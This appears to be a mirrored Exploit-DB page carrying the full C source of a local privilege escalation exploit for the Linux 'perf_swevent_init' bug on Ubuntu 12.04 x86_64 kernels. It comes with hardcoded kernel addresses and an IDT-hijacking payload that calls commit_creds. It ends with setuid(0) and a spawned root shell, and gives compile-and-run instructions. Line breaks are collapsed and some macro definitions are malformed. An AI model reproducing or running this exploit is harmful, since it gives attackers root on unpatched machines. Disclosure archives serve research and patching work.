Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) – ‘perf_swevent_init’ Local Privilege Escalation (3)

• Exploit Database
• 110 阅读

• 作者： Vitaly Nikolenko
  日期： 2014-05-31
• 类别：

  • local
  平台：

  • linux_x86-64
• 来源：https://www.exploit-db.com/exploits/33589/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  /** * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit * by Vitaly Nikolenko (vnik5287@gmail.com) * * based on semtex.c by sd * * Supported targets: * [0] Ubuntu 12.04.0 - 3.2.0-23-generic * [1] Ubuntu 12.04.1 - 3.2.0-29-generic * [2] Ubuntu 12.04.2 - 3.5.0-23-generic * * $ gcc vnik.c -O2 -o vnik * * $ uname -r * 3.2.0-23-generic * * $ ./vnik 0 */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE0x1780000000 #define SIZE0x0010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);   uint64_t targets[3][3] = {{0xffffffff81ef67e0,// perf_swevent_enabled 0xffffffff81091630,// commit_creds 0xffffffff810918e0}, // prepare_kernel_cred {0xffffffff81ef67a0, 0xffffffff81091220, 0xffffffff810914d0}, {0xffffffff81ef5940, 0xffffffff8107ee30, 0xffffffff8107f0c0} };   void __attribute__((regparm(3))) payload() { uint32_t *fixptr = (void*)AB(1); // restore the handler *fixptr = -1; commit_creds_fn commit_creds = (commit_creds_fn)AB(2); prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); commit_creds(prepare_kernel_cred((uint64_t)NULL)); } void trigger(uint32_t off) { uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert( !close(fd) ); } int main(int argc, char **argv) { uint64_t off64, needle, kbase, *p; uint8_t *code; uint32_t int_n, j = 5, target = 1337; int offset = 0; void *map;   assert(argc == 2 && "target?"); assert( (target = atoi(argv[1])) < 3 );   struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt;   // mmap user-space block so we don&apos;t page fault // on sw_perf_event_destroy assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE);   asm volatile("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; printf("IDT addr = 0x%lx\n", idt.addr);   assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);   // can only play with interrupts 3, 4 and 0x80 for (int_n = 3; int_n <= 0x80; int_n++) { for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { int off32 = off64; if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { offset = off32; goto out; } } if (int_n == 4) { // shit, let&apos;s try 0x80 if the kernel is compiled with // CONFIG_IA32_EMULATION int_n = 0x80 - 1; } } out: assert(offset); printf("Using int = %d with offset = %d\n", int_n, offset);   for (j = 0; j < 3; j++) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; } trigger(offset); switch (int_n) { case 3: asm volatile("int $0x03"); break; case 4: asm volatile("int $0x04"); break; case 0x80: asm volatile("int $0x80"); }   assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); }